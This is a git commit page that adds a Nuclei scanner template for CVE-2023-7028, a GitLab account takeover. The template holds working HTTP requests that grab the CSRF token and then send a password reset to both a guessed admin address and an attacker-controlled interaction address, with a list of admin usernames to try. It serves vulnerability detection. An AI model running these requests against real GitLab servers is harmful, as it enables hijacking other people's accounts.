Merge pull request #8937 from projectdiscovery/princechaddha-patch-1
GitLab Account Takeover via Password Reset without user interactions - CVE-2023-7028patch-1
commit
527cf9506d
|
@ -0,0 +1,72 @@
|
|||
id: CVE-2023-7028
|
||||
|
||||
info:
|
||||
name: GitLab - Account Takeover via Password Reset
|
||||
author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
|
||||
reference:
|
||||
- https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
|
||||
- https://x.com/rwincey/status/1745659710089437368?s=20
|
||||
- https://gitlab.com/gitlab-org/gitlab/-/issues/436084
|
||||
- https://hackerone.com/reports/2293343
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2023-7028
|
||||
cwe-id: CWE-284
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
vendor: gitlab
|
||||
product: gitlab
|
||||
shodan-query: title:"Gitlab"
|
||||
tags: cve,cve2023,gitlab,auth-bypass,intrusive
|
||||
flow: |
|
||||
http(1);
|
||||
set("token", template["token"][0]);
|
||||
http(2);
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /users/sign_in HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: token
|
||||
group: 1
|
||||
regex:
|
||||
- name="authenticity_token" value="([A-Za-z0-9_-]+)"
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
POST /users/password HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{RootURL}}/users/password/new
|
||||
|
||||
authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- admin@example.com
|
||||
- admin@{{RDN}}
|
||||
- root@{{RDN}}
|
||||
- gitlab@{{RDN}}
|
||||
- git@{{RDN}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- contains(interactsh_protocol, 'smtp')
|
||||
|
||||
extractors:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- username
|
Loading…
Reference in New Issue